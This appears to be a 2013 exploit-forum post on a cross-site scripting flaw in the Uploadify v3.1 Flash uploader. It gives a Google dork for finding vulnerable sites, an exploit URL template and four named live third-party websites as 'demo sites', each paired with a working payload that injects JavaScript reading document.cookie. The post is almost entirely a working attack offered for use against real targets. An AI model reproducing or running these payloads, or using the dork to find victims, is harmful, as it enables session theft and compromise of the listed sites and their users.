===============================
Title : Uploadify v3.1 XSS Vulnerability
# Date: 2013-09-1
# Software Link:
[You must be registered and logged in to see this link.]# Founded by: ''Master Zombie''
# Tested on: Windows XP SP3
# Category: [webapps]
# Dork : inurl:admin/include/uploadify
===============================
Exploit path:
- Code:
-
http://127.0.0.1/admin/include/uploadify/uploadify.swf?buttonText=<a href=[ XSS ]
Demo Sites :
- Code:
-
http://www.renders-dbz.com/admin/include/uploadify/uploadify.swf?buttonText=<a href='javascript:alert(document.cookie)'>W-P</a>
- Code:
-
http://photos.davidandginny.co.uk/admin/include/uploadify/uploadify.swf?buttonText=<a href='javascript:alert(document.cookie)'>W-P</a>
- Code:
-
http://landevejsridder.dk/piwigo/admin/include/uploadify/uploadify.swf?buttonText=<a href='javascript:alert(document.cookie)'>W-P</a>
- Code:
-
http://massecritique.agora.eu.org/piwigo/admin/include/uploadify/uploadify.swf?buttonText=<a href='javascript:alert(document.cookie)'>W-P</a>